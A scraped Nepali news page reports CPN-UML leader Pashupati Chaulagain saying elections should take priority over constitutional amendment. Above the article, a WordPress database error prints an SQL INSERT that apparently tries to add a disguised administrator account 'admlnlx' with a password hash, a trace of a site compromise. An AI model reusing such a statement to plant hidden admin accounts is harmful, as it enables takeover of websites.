WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BoimacLngACQU.Hzh4wouO8c4WKlKd0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 03:22:06', '', 'admlnlx', 'admlnlx')

आजको आवश्यकता निर्वाचन हो– नेता चौलागार्इंले – Gaule Khabar

आजको आवश्यकता निर्वाचन हो– नेता चौलागार्इंले

आजको आवश्यकता निर्वाचन हो– नेता चौलागार्इंले

भक्तपुर,माघ २५ –

नेकपा एमालेका पोलिटब्यूरो सदस्य पशुपति चौलागार्इंले आजको आवश्यकता निर्वाचन भएकाले यसतर्फ केन्द्रित हुन सरकारलाई आग्रह गर्नुभएको छ ।

रफत सञ्चार क्लबमा आज आयोजित साक्षात्कार कार्यक्रममा उहाँले भन्नुभयो — देशका लागि तत्कालको आवश्यकता संविधान संशोधन भन्दा पनि निर्वाचन भएकाले सरकार यसतर्फ केन्द्रित हुनुपर्दछ ।

नेता चौलागार्इंले सरकारले निर्वाचनको नाममा जनताको आँखामा छारो हाल्ने काम मात्रै गरिरहेको आरोप लगाउँदै सरकारले निर्वाचन गर्न नचाहेको बताउनुभयो ।

“काँग्रेसभित्रपनि निर्वाचन गराउने र नगराउने दुई धार देखिएको छ छ,” उहाँले भन्नुभयो — एमाले कुनै पनि हालतमा जेठको पहिलो साताभित्र निर्वाचन गर्नुपर्ने पक्षमा छ ।

नेता चौलागार्इंले निर्वाचनबाट दुई तिहाई मत ल्याएर संविधान संशोधन गर्न मधेसी मोर्चालाई चुनौती दिँदै ९० प्रतिशतभन्दा बढी बहुमतले पारित गरेको सविधानलाई कसैले भन्दैमा संशोधन गर्न नुहने बताउनुभयो । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका